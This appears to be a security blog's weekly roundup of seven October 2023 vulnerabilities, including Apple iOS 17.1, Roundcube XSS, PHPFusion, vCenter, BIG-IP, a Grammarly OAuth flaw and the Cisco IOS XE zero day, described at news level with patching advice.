Weekly Vulnerability Summary: 7 New Vulnerabilities for the week of October 22, 2023

Every week is going to be filled with a large diversity of vulnerabilities, some that are more dangerous than others, and some more important to your cybersecurity than others. In this week’s summary, we cover a diverse set of issues that you should be aware of and use to stay up to date.

1. Apple iOS 17.1 Vulnerabilities

   Apple patched numerous vulnerabilities in a wide-sweeping update release this week, affecting iOS 17.1, iPadOS 17.1, Safari 17.1, watchOS 10.1, tvOS 17.1, and macOS Sonoma 14.1. Especially for iOS 17.1, multiple sensitive information disclosure, arbitrary code execution, denial of service, and authentication bypass vulnerabilities were fixed in numerous apps and components. This also includes patches for older versions of iOS 15.8 as it was found that numerous vulnerabilities were being exploited by the espionage campaign known as Operation Triangulation and its malware TriangleDB.

   We highly recommend updating to the latest version on all your Apple devices to ensure you stay secure.

2. Roundcube Webmail XSS

   News was announced by security researchers at ESET, that the malicious group Winter Vivern exploited a new stored XSS vulnerability in Roundcube Webmail. This group previously exploited a similar vulnerability several years ago, and this shows the dedication of hackers to always keep trying to break things. These servers are found in numerous government agencies throughout the world. It is exploited by sending a specially crafted message, which loads arbitrary JavaScript, and all of this can be done by simply viewing the email in the web browser, no interaction beyond that is needed.

   This highlights the need to constantly be vigilant for security patches, as a critical vulnerability could be released at any time. It also shows how relevant phishing emails still remain to be.

3. PHPFusion Vulnerabilities

   PHPFusion is an opensource content management system (CMS) that is used by over 15 million site worldwide. CVE-2023-2453 allows for remote code execution by uploading a specially crafted .php file on the target system. This is combined with a file read and write vulnerability CVE-2023-4480. In order to exploit these vulnerabilities, the attacker would need access to an account of any privilege level and know the vulnerable endpoint, then be able to upload PHP files. Once exploited, the privileges of the attacker would become those of the target account, even administrators.

4. vCenter Critical Vulnerabilities

   VMware vCenter just patched two vulnerabilities, a critical remote code execution CVE-2023-34048 exploit and a non-privileged information disclosure vulnerability CVE-2023-34056. VMware has released patches for vCenter Server 6.7U3, 6.5U3, VCF 3.x, and vCenter Server 8.0U1.

   This comes on the back of earlier vulnerabilities that were released earlier this year, both for its log storage and alysis tool Aria Operations, CVE-2023-34051 and CVE-2023-20887. The proof of concept (PoC) explanation and code can be found here: Summoning Team’s Blog.

5. Big-IP Unauthenticated RCE

   F5 announced that Big-IP’s configuration utility allows for unauthenticated requests to bypass authentication: CVE-2023-46747. F5 stated that the vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self-IP addresses to execute arbitrary system commands. It only affects the control plane, and has no data plane exposure.

   This like many vulnerabilities that have been discussed before, is very similar to a previous finding that F5 explained last year, originating from an Apache HTTP Request Smuggling vulnerability.

6. Open Authentication (OAuth) Sign-in Vulnerabilities

   Issues in Grammarly’s implemented of OAuth led to sign-in vulnerabilities. Luckily no known accounts were compromised, but these issues with OAuth implementation can affect any company. This attack was dubbed “Pass-the-Token”, and takes advantage of business logic flaws, allowing attackers to insert tokens from another site to gain access as site like Grammarly failed to verify them.

   The flaws in verification could allow for complete access to a user's accounts on websites, which could reveal bank account information, credit card details, and other sensitive data; as well as performing any action on behalf of that user which could lead to identity theft and fraud.

7. Cisco IOS XE Zero Day: CVE-2023-20198

   Cisco devices running IOS XE with HTTP or HTTPS server features enabled were affected by a new exploit that was deemed Critical. This vulnerability allows an unauthenticated attacker to remotely execute code to gain privileged access to the device. Cisco’s advisory asks all customers using IOS XE to disable the HTTP and HTTPS server features from the public internet as they work on a patch. To determine if you have been affected, see our blog post on CVE-2023-20198 configurations, forensic artifacts, and IoCs.